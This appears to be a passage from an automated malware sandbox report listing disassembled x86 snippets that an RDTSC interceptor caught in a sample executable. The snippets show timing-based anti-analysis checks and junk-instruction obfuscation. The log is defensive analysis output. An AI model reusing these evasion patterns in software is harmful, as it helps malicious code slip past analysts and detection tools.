Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 50BBE2 second address: 50BC32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8124CF45A4h 0x0000000e js 00007F8124CF4596h 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007F8124CF45A3h 0x0000001d jno 00007F8124CF4596h 0x00000023 popad 0x00000024 jnp 00007F8124CF4598h 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53CFB0 second address: 53CFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8124DF87CEh 0x00000008 jmp 00007F8124DF87D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53CFD3 second address: 53CFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8124CF459Ch 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D428 second address: 53D42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D42C second address: 53D432 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D744 second address: 53D766 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8124DF87CFh 0x00000010 jl 00007F8124DF87C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D766 second address: 53D76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D76E second address: 53D79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F8124DF87D3h 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8124DF87D1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D79C second address: 53D7AC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8124CF459Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D7AC second address: 53D7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53D8E6 second address: 53D8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8124CF4596h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 53E87C second address: 53E880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 541FF6 second address: 542015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8124CF45A9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545B9B second address: 545BAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545BAD second address: 545BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8124CF459Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545BCE second address: 545BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545BD4 second address: 545BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545BF7 second address: 545C01 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545C01 second address: 545C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8124CF4596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 544ABD second address: 544AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 544AC1 second address: 544AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 545E97 second address: 545E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54ABB8 second address: 54ABCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F8124CF459Ch 0x0000000d jnp 00007F8124CF4596h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54B28B second address: 54B290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54E300 second address: 54E32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8124CF459Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8124CF45A8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54EDA5 second address: 54EE0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F8124DF87C8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 jmp 00007F8124DF87CCh 0x0000002b nop 0x0000002c jmp 00007F8124DF87CFh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F8124DF87CFh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54EE0A second address: 54EE10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54F1CA second address: 54F1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54F8CF second address: 54F8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 550236 second address: 550257 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8124DF87D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 550257 second address: 5502E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F8124CF4598h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F8124CF459Bh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F8124CF4598h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 pushad 0x00000047 jmp 00007F8124CF459Ch 0x0000004c mov edx, 6DFB36D5h 0x00000051 popad 0x00000052 jmp 00007F8124CF45A4h 0x00000057 xchg eax, ebx 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b js 00007F8124CF4596h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5502E1 second address: 5502EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5502EF second address: 5502F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5502F3 second address: 5502F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5502F7 second address: 5502FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5502FD second address: 550302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 550302 second address: 550308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55135C second address: 55138D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8124DF87D5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 550B8D second address: 550B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 551D88 second address: 551D8E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5528FC second address: 552902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 552647 second address: 55264C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 553234 second address: 55323A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55323A second address: 553240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 554690 second address: 554694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 554694 second address: 55469A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 557702 second address: 557712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F8124CF4596h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55970B second address: 559710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55447B second address: 55447F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55A8A9 second address: 55A8AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55C6C4 second address: 55C6C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55C6C8 second address: 55C6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8124DF87CAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55C6DD second address: 55C6EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F8124CF4596h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55E58E second address: 55E600 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8124DF87DFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F8124DF87D2h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F8124DF87C8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e movzx ebx, si 0x00000031 push 00000000h 0x00000033 mov bx, ax 0x00000036 xor dword ptr [ebp+122D27F8h], edi 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55E600 second address: 55E607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55E607 second address: 55E60E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5598DC second address: 5598E6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8124CF4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55E60E second address: 55E61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5598E6 second address: 55997F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8124CF4598h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sub dword ptr [ebp+12463F85h], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a sub dword ptr [ebp+122D2231h], edi 0x00000020 and edi, dword ptr [ebp+122D27B9h] 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F8124CF4598h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov bl, EDh 0x00000049 mov eax, dword ptr [ebp+122D0321h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F8124CF4598h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov edi, 4FC5FF02h 0x0000006e adc bh, FFFFFFF8h 0x00000071 push FFFFFFFFh 0x00000073 jl 00007F8124CF459Ch 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push esi 0x0000007d pushad 0x0000007e popad 0x0000007f pop esi 0x00000080 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55D838 second address: 55D83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55D83D second address: 55D842 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5603D2 second address: 5603D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55D842 second address: 55D84E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5612DD second address: 5612E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5612E1 second address: 56136D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F8124CF4598h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F8124CF4598h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e js 00007F8124CF459Ch 0x00000044 and edi, dword ptr [ebp+122D2B79h] 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F8124CF4598h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 xchg eax, esi 0x00000067 push eax 0x00000068 push edx 0x00000069 jno 00007F8124CF4598h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 55E754 second address: 55E758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5623F1 second address: 5623F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5623F5 second address: 5623FF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 562673 second address: 56267E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F8124CF4596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5637B2 second address: 5637C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8124DF87C8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F8124DF87C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5645E5 second address: 5645FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5645FD second address: 564602 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 564602 second address: 564619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F8124CF459Bh 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 564619 second address: 56469A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8124DF87CEh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jnc 00007F8124DF87D6h 0x00000012 push 00000000h 0x00000014 add edi, 3F48B0AEh 0x0000001a xor ebx, dword ptr [ebp+124778FEh] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F8124DF87C8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c sub edi, 47C81B0Ah 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jg 00007F8124DF87C6h 0x0000004c jmp 00007F8124DF87D1h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56469A second address: 5646C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8124CF45A8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F8124CF459Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5655D9 second address: 5655F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8124DF87C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007F8124DF87E4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F8124DF87C6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5648DA second address: 5648E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8124CF459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56585A second address: 56585E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56585E second address: 565862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 565862 second address: 56586C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
